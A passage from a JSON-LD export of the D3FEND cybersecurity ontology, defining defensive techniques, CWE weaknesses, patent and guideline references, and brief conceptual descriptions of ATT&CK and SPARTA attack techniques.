      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "_:N00dd8341a8244b64b80825200cde0a05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:HardeningEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event involving actions to strengthen defenses, such as applying patches or implementing secure configurations, reducing attack surfaces, and increasing the difficulty of exploitation by adversaries.",
      "d3f:related": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Hardening Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:T0865",
      "@type": "owl:Class",
      "d3f:attack-id": "T0865",
      "d3f:definition": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019)",
      "rdfs:label": "Spearphishing Attachment - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Spearphishing Attachment"
    },
    {
      "@id": "d3f:Reference-ApparatusForToProvideContentToAndQueryAReverseDomainNameSystemServer",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100174829A1/en?oq=20100174829"
      },
      "d3f:kb-abstract": "An apparatus is disclosed for to provide content to and query a reverse domain name system (DNS) server without depending on the kindness of domain name system registrars, registrants. DNS replies are observed by firewalls or filters, analyzed, and transmitted to a reverse domain name system server. An embodiment of the present invention can be within a DNS server or SMTP server.",
      "d3f:kb-author": "Dean Danko",
      "d3f:kb-mitre-analysis": "This patent includes the description of a method of blocking email traffic from untrusted domains by analyzing the TCP/IP source IP addresses and blocking traffic for IPs whose reverse lookup response FQDN matches a denylist.",
      "d3f:kb-reference-title": "Apparatus for to provide content to and query a reverse domain name system server",
      "rdfs:label": "Reference - Apparatus for to provide content to and query a reverse domain name system server - Barrracuda Networks"
    },
    {
      "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf"
      },
      "d3f:kb-author": "NIST",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:One-timePassword"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "d3f:kb-reference-title": "Digital Identity Guidelines",
      "rdfs:label": "Reference - Digital Identity Guidelines 800-63-3"
    },
    {
      "@id": "d3f:Reference-Computer-implementedMethodsAndSystemsForIdentifyingVisuallySimilarTextCharacterStrings_GreathornInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10320815B2/en?oq=US-10320815-B2"
      },
      "d3f:kb-abstract": "Methods and systems are disclosed for selecting text character strings from a corpus of relevant strings that would commonly be considered to be visually similar to human viewer to an input string. The initial corpus may be any sufficiently broad or specific source of text, e.g., the names of users in a computer application system. The character strings in the corpus are classified such that direct, character-by-character comparisons may be limited to a small subset of likely-similar strings. The input string is then directly compared to strings that are likely to be similar to it, taking into account individual characters' similarities, combinations of characters that look similar to individual characters, transposition of characters, and simple additions and deletions.",
      "d3f:kb-author": "Raymond W. Wallace, III",
      "d3f:kb-mitre-analysis": "Text input is compared to an engine of look-alike sets of text characters. An estimate of similar characters based on the engine is conducted, and an alert is triggered if the estimated similarity is lower than a given threshold.",
      "d3f:kb-organization": "Greathorn Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "Computer-implemented methods and systems for identifying visually similar text character strings",
      "rdfs:label": "Reference - Computer-implemented methods and systems for identifying visually similar text character strings - Greathorn Inc"
    },
    {
      "@id": "d3f:T1021.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.008",
      "d3f:definition": "Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).",
      "rdfs:label": "Direct Cloud VM Connections",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:T1153",
      "@type": "owl:Class",
      "d3f:attack-id": "T1153",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Source",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:Hostname",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "d3f:definition": "In computer networking, a hostname (archaically nodename) is a label that is assigned to a device connected to a computer network and that is used to identify the device in various forms of electronic communication, such as the World Wide Web. Hostnames may be simple names consisting of a single word or phrase, or they may be structured.",
      "d3f:identifies": {
        "@id": "d3f:Host"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hostname"
      },
      "rdfs:label": "Hostname",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Neca4b59d2308413d8d5365ff5bfadb8e"
        }
      ],
      "skos:altLabel": "Nodename"
    },
    {
      "@id": "_:Neca4b59d2308413d8d5365ff5bfadb8e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:IOPortRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IOPortRestriction"
      ],
      "d3f:d3fend-id": "D3-IOPR",
      "d3f:definition": "Limiting access to computer input/output (IO) ports to restrict unauthorized devices.",
      "d3f:filters": [
        {
          "@id": "d3f:InputDevice"
        },
        {
          "@id": "d3f:RemovableMediaDevice"
        }
      ],
      "d3f:isolates": {
        "@id": "d3f:IOModule"
      },
      "d3f:kb-article": "## How It works\n\nSoftware-based restriction uses agent software installed on a computer system. The agent software monitors all IO port system traffic. The agent software is configurable to limit the use of certain devices connected to IO ports. The restriction software can also be configured to limit the access to files and applications on external storage devices connected to IO ports.\n\nHardware-based restriction can also be employed to limit access to IO ports. For example, a hardware USB filter device that is placed between the host system and the external devices can filter IO port connections based on configurable rules. When new devices are connected to the USB filter the type of device is determined. Using an allow list a connection determination is made for the device.\n\nSome implementations detect when a device is connected in order to authorize the connection against a list of approved devices, in some cases by device type. For example, if the device is determined to be a storage device, then the contained files and executables are examined to more accurately identify the device type.\n\nTypes of restrictions that may be applied:\n- Device connection\n- Device command filtering\n- Device file system read or write restrictions\n\n## Considerations\n * Agent software will need to be installed on host systems\n * Configurations for allow/deny for devices and files will need to be maintained",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ComputerMotherboardHavingPeripheralSecurityFunctions"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForControllingCommunicationPorts"
        },
        {
          "@id": "d3f:Reference-USBFilterForHubMaliciousCodePreventionSystem"
        }
      ],
      "rdfs:label": "IO Port Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N3e4e8f12e5fb4b9fb4fbd12d824b12d9"
        },
        {
          "@id": "_:N47da70d5b2de45c6aa3f86987121a5b3"
        },
        {
          "@id": "_:N346e163a413d4076b658ae809882d95d"
        }
      ]
    },
    {
      "@id": "_:N3e4e8f12e5fb4b9fb4fbd12d824b12d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "_:N47da70d5b2de45c6aa3f86987121a5b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "_:N346e163a413d4076b658ae809882d95d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IOModule"
      }
    },
    {
      "@id": "d3f:LinuxReadv",
      "@type": "owl:Class",
      "d3f:definition": "Read data into multiple buffers.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/readv.2.html"
      },
      "rdfs:label": "Linux Readv",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:Reference-Entrust-What-Is-Token-Based-Authentication",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.entrust.com/resources/learn/what-is-token-based-authentication"
      },
      "d3f:kb-abstract": "Token-based authentication is an authentication protocol where users verify their identity in exchange for a unique access token. Users can then access the website, application, or resource for the life of the token without having to re-enter their credentials.",
      "d3f:kb-organization": "Entrust",
      "d3f:kb-reference-of": {
        "@id": "d3f:Token-basedAuthentication"
      },
      "d3f:kb-reference-title": "Identity Providers: What is Token Based Authentication",
      "rdfs:label": "Reference - Identity Providers: What is Token Based Authentication"
    },
    {
      "@id": "d3f:CyberSensor",
      "@type": "owl:Class",
      "d3f:definition": "A cyber sensor collects and monitors data related to cyber activities, events, or environments.",
      "rdfs:label": "Cyber Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:CWE-153",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-153",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Substitution Characters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-460",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-460",
      "d3f:definition": "The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.",
      "rdfs:label": "Improper Cleanup on Thrown Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-459"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:ComputingImage",
      "@type": "owl:Class",
      "d3f:definition": "A computing image captures the full state or contents of a computing entity, such as a process or volume.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/System_image#Process_images"
      },
      "rdfs:label": "Computing Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-IntelControlEnforcementTechnology",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf"
      },
      "d3f:kb-organization": "Intel Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Complex Shadow-Stack Updates (Intel Control-Flow Enforcement Technology)",
      "rdfs:label": "Reference - Control Enforcement Technology (CET) - Intel Corporation"
    },
    {
      "@id": "d3f:CWE-690",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-690",
      "d3f:definition": "The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference.",
      "rdfs:label": "Unchecked Return Value to NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-252"
        },
        {
          "@id": "d3f:CWE-476"
        }
      ]
    },
    {
      "@id": "d3f:LM-0006.01",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0006.01",
      "d3f:definition": "In shared launches, multiple independent payloads cohabit common infrastructure until separation. If isolation is incomplete (e.g., shared data buses, mispartitioned deployer controllers, common logging/telemetry collectors, or cross-connected laptops and recorders), a compromise in one payload’s domain can be leveraged to observe or influence another’s traffic before release. Threat actors exploit these transient but real connections to read configuration, pivot through deployer control paths, or stage data/commands that execute as neighboring payloads power and check out, enabling cross-payload access or tampering prior to independent flight.",
      "rdfs:label": "Rideshare Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0006/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LM-0006"
      },
      "skos:prefLabel": "Rideshare Payload"
    },
    {
      "@id": "d3f:T1204.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.004",
      "d3f:definition": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
      "rdfs:label": "Malicious Copy and Paste",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingThreatAndRiskAssessmentOfAsset-actorInteractions_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191559A1"
      },
      "d3f:kb-abstract": "Disclosed is an approach to detect insider threats, by tracking unusual access activity for a specific user or computer with regard to accessing key assets over time. In this way, malicious activity and the different preparation phases of attacks can be identified.",
      "d3f:kb-author": "Himanshu Mhatre; David Lopes Pegna; Oliver Brdiczka",
      "d3f:kb-mitre-analysis": "The patent describes an insider threat detection system that analyzes packets sent within a network to identify and isolate malicious behavior. Current network traffic is collected and developed into a baseline that establishes the amount of data sent and received between a specific asset and a host. Current data transfer values are then compared with the baseline to identify anomalies.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserDataTransferAnalysis"
      },
      "d3f:kb-reference-title": "System for implementing threat detection using threat and risk assessment of asset-actor interactions",
      "rdfs:label": "Reference - System for implementing threat detection using threat and risk assessment of asset-actor interactions - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-708",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-708",
      "d3f:definition": "The product assigns an owner to a resource, but the owner is outside of the intended control sphere.",
      "rdfs:label": "Incorrect Ownership Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-282"
      }
    },
    {
      "@id": "d3f:OTHumanMachineInterface",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:HMIApplication"
        },
        {
          "@id": "d3f:InputDevice"
        },
        {
          "@id": "d3f:OutputDevice"
        }
      ],
      "d3f:definition": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters.",
      "d3f:modifies": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:reads": {
        "@id": "d3f:OTProcessDataHistorian"
      },
      "d3f:synonym": "HMI",
      "rdfs:label": "OT Human Machine Interface",
      "rdfs:seeAlso": {
        "@id": "https://www.rockwellautomation.com/en-us/products/details.2711P-T12W21D8S.html#documentation"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N0c6c8cc3a1c24fd8a326d622f89567f4"
        },
        {
          "@id": "_:N19ac79813cab442d9ade3328d44b3096"
        },
        {
          "@id": "_:N8887b9461cd64f8fac1d9d37f3bda85c"
        },
        {
          "@id": "_:Nb272ef0aeacf43fd8c79bc5ce703d770"
        },
        {
          "@id": "_:Nac3bf209034f450481ff184d571a54ff"
        }
      ]
    },
    {
      "@id": "_:N0c6c8cc3a1c24fd8a326d622f89567f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HMIApplication"
      }
    },
    {
      "@id": "_:N19ac79813cab442d9ade3328d44b3096",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "_:N8887b9461cd64f8fac1d9d37f3bda85c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "_:Nb272ef0aeacf43fd8c79bc5ce703d770",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:Nac3bf209034f450481ff184d571a54ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataHistorian"
      }
    },
    {
      "@id": "d3f:RegSetValueExA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueExA"
    },
    {
      "@id": "d3f:FileMagicBytes",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specific type of header signature located at the beginning of a file, used to identify the file format.",
      "rdfs:label": "File Magic Bytes",
      "rdfs:subClassOf": {
        "@id": "d3f:FileHeaderBlockSignature"
      }
    },
    {
      "@id": "d3f:DE-0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:EventLog"
      },
      "d3f:attack-id": "DE-0010",
      "d3f:definition": "The adversary hides activity by exhausting finite on-board logging and telemetry buffers so incriminating events are overwritten before they can be downlinked. Spacecraft typically use ring buffers with severity filters, per-subsystem quotas, and scheduled dump windows; by generating bursts of benign but high-frequency events (file listings, status queries, low-severity housekeeping, repeated mode toggles) or by provoking chatter from chatty subsystems, the attacker accelerates rollover. Variants target recorder indexes and event catalogs so new entries displace older ones, or they align floods with known downlink gaps and pass handovers when retention is shortest. To analysts on the ground, logs appear present but incomplete, showing a plausible narrative that omits the very interval when unauthorized commands or updates occurred.",
      "rdfs:label": "Overflow Audit Log - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0010/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N65bc85e130c74bfa88d9b14ff4bebb6e"
        }
      ],
      "skos:prefLabel": "Overflow Audit Log"
    },
    {
      "@id": "_:N65bc85e130c74bfa88d9b14ff4bebb6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:CWE-1105",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1105",
      "d3f:definition": "The product or code uses machine-dependent functionality, but it does not sufficiently encapsulate or isolate this functionality from the rest of the code.",
      "rdfs:label": "Insufficient Encapsulation of Machine-Dependent Functionality",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1061"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:T1003.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:Process"
        }
      ],
      "d3f:attack-id": "T1003.001",
      "d3f:definition": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).",
      "rdfs:label": "LSASS Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nc33bef1359de465084ac1928eca25133"
        },
        {
          "@id": "_:Nca45034a6c1b409a86caadc32e36f5f9"
        }
      ]
    },
    {
      "@id": "_:Nc33bef1359de465084ac1928eca25133",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:Nca45034a6c1b409a86caadc32e36f5f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:PointerValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-PV",
      "d3f:definition": "Ensuring that a pointer variable has the required properties for use.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PointerValidationFunction_SEI"
      },
      "rdfs:label": "Pointer Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:SourceCodeHardening"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyRenamingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the name of a registry key is changed, altering its identifier within the registry hierarchy.",
      "rdfs:label": "Windows Registry Key Renaming Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N08bc2043e8d545ba82b8a815f7969cd4"
        }
      ]
    },
    {
      "@id": "_:N08bc2043e8d545ba82b8a815f7969cd4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:WindowsDuplicateToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The DuplicateToken function creates a new access token that duplicates one already in existence.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtDuplicateToken"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken"
      },
      "rdfs:label": "Windows DuplicateToken",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICopyToken"
        },
        {
          "@id": "_:Nc03c2619e914432d8c13706b5daa695f"
        }
      ]
    },
    {
      "@id": "_:Nc03c2619e914432d8c13706b5daa695f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtDuplicateToken"
      }
    },
    {
      "@id": "d3f:T0830",
      "@type": "owl:Class",
      "d3f:attack-id": "T0830",
      "d3f:definition": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
      "rdfs:label": "Adversary-in-the-Middle - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Adversary-in-the-Middle"
    },
    {
      "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.omg.org/spec/UAF/"
      },
      "d3f:kb-abstract": "UAF is an OMG standard that assists in development of architectural descriptions in commercial industry firms, federal government agencies and defense organizations. UAF has a variety of use cases from Enterprise and Mission architecting, to System of Systems (SoS) and Cyber-physical Systems engineering, as well as being an enabler for Digital Transformation efforts and for Department of Defense Architecture Framework (DoDAF) and NATO Architecture Framework (NAF) modeling. Architectural Descriptions in UAF are aligned with ISO/IEC/IEEE 42010:2011, Systems and software engineering -- Architecture description.",
      "d3f:kb-organization": "OMG",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "d3f:OperationalDependencyMapping"
        },
        {
          "@id": "d3f:OrganizationMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Unified Architecture Framework (UAF)",
      "rdfs:label": "Reference - Unified Architecture Framework (UAF)"
    },
    {
      "@id": "d3f:NetworkMultimediaStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital multimedia content to users.",
      "rdfs:label": "Network Multimedia Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:Multi-factorAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Multi-factorAuthentication"
      ],
      "d3f:d3fend-id": "D3-MFA",
      "d3f:definition": "Requiring proof of two or more pieces of evidence in order to authenticate a user.",
      "d3f:kb-article": "## How it works\nWhen logging into an account users present two or more credentials that fall into different categories: something you know (password or PIN), something you have (smart card or phone), or something you are (fingerprint).\n\n## Considerations\nMFA configuration steps may vary across accounts and in some cases left up to users to activate and implement.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndApparatusForUtilizingATokenForResourceAccess_RsaSecurityInc."
      },
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Multi-factor Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:N36424594c0ee46b5862e48bb7cb22f98"
        }
      ]
    },
    {
      "@id": "_:N36424594c0ee46b5862e48bb7cb22f98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:Reference-LeverageSecurityFrameworksLibraries_OWASP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://top10proactive.owasp.org/archive/2018/c2-leverage-security-frameworks-libraries/"
      },
      "d3f:kb-organization": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:TrustedLibrary"
      },
      "d3f:kb-reference-title": "Leverage Security Frameworks and Libraries",
      "rdfs:label": "Reference - Leverage Security Frameworks and Libraries - OWASP"
    },
    {
      "@id": "d3f:InboundInternetEncryptedWebTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound internet web traffic is network traffic that is: (a) on an incoming connection initiated from a host outside the network to a host within a network, and (b) using a standard web encryption protocol.",
      "rdfs:label": "Inbound Internet Encrypted Web Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundInternetEncryptedTraffic"
        },
        {
          "@id": "d3f:InboundInternetWebTraffic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-159",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-159",
      "d3f:definition": "The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.",
      "rdfs:label": "Improper Handling of Invalid Use of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:HardwareDeviceMoveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is relocated or reassigned within a system or network, potentially affecting its operational scope or connectivity.",
      "rdfs:label": "Hardware Device Move Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:AccessDeniedEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the refusal of access to a resource, where an access request has been evaluated and denied based on current authorization policies, preventing operations by the requesting agent.",
      "rdfs:label": "Access Denied Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessMediationEvent"
      }
    },
    {
      "@id": "d3f:CWE-1243",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1243",
      "d3f:definition": "Access to security-sensitive information stored in fuses is not limited during debug.",
      "rdfs:label": "Sensitive Non-Volatile Information Not Protected During Debug",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1263"
      }
    },
    {
      "@id": "d3f:WindowsResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtResumeThread"
      },
      "rdfs:isDefinedBy": {
